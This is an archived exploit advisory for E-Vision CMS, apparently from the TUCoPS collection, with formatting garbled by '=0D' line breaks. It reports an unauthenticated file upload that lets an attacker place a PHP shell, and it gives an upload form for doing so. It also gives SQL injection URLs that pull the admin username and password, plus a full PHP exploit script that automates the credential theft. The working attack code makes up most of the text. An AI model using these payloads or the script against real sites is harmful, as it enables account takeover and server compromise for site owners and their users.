Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: b06-4847.htm

E-Vision CMS Multible Remote injections



E-Vision CMS Multible Remote injections
E-Vision CMS Multible Remote injections



Hello,,=0D
=0D
E-Vision CMS Multible Remote injections (SQL and File upload)=0D
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D 
Email Address : security@soqor.net=0D 
=0D
=0D
upload any file=0D
=0D
admin/x_image.php=0D
this file is used to upload files and it does not check the permission=0D
=0D
This file can be used to upload any file to the dir /imagebank=0D
replace http://localhost/evision_cms/ to the website dir and choose any file to upload it will be uploaded=0D 
=0D
action="http://localhost/evision_cms/admin/x_image.php" method="POST">=0D =0D =0D Upload PHP Shell : =0D
=0D =0D =0D - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -=0D Sql Injection=0D Password:=0D admin/all_users.php?from=-1%20union%20select%20null,null,null,pass,null%20from%20users%20where%20idusers=1/*=0D User Name:=0D admin/all_users.php?from=-1%20union%20select%20null,null,null,username,null%20from%20users%20where%20idusers=1/*=0D =0D - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -=0D =0D Exploits :-=0D For PHP shell uploading:-=0D action="http://localhost/evision_cms/admin/x_image.php" method="POST">=0D =0D =0D Upload PHP Shell : =0D
=0D =0D - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - =0D For Sql injection:-=0D #!/usr/bin/php -q -d short_open_tag=on=0D WwW.SoQoR.NeT=0D */=0D print_r('=0D /**********************************************/=0D /* e-Vision CMS Remote sql injection exploit */=0D /* by HACKERS PAL */=0D /* site: http://www.soqor.net */');=0D if ($argc<2) {=0D print_r('=0D /* -- */=0D /* Usage: php '.$argv[0].' host=0D /* Example: */=0D /* php '.$argv[0].' http://localhost/evision=0D /**********************************************/=0D ');=0D die;=0D }=0D error_reporting(0);=0D ini_set("max_execution_time",0);=0D ini_set("default_socket_timeout",5);=0D =0D $url=$argv[1];=0D $exploit="/admin/all_users.php?from=-1%20union%20select%20null,null,null,username,null%20from%20users%20where%20idusers=1/*";=0D $exploit2="/admin/all_users.php?from=-1%20union%20select%20null,null,null,pass,null%20from%20users%20where%20idusers=1/*";=0D =0D Function get_page($url)=0D {=0D =0D if(function_exists("file_get_contents"))=0D {=0D =0D $contents = file_get_contents($url);=0D =0D }=0D else=0D {=0D $fp=fopen("$url","r");=0D while($line=fread($fp,1024))=0D {=0D $contents=$contents.$line;=0D }=0D =0D =0D }=0D return $contents;=0D }=0D =0D function get($var)=0D {=0D if(strlen($var[1])>0)=0D {=0D Echo trim($var[1]);=0D }=0D }=0D =0D $page = get_page($url.$exploit);=0D $page2 = get_page($url.$exploit2);=0D =0D if(preg_match('/\(.+?)<\/td\>/is',$page))=0D {=0D Echo "\n[+] User Name : ";=0D preg_replace_callback('/\(.+?)<\/td\>/is','get',$page);=0D Echo "\n[+] Pass Word : ";=0D preg_replace_callback('/\(.+?)<\/td\>/is','get',$page2);=0D Die("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D }=0D =0D Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D ?>=0D =0D #WwW.SoQoR.NeT


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH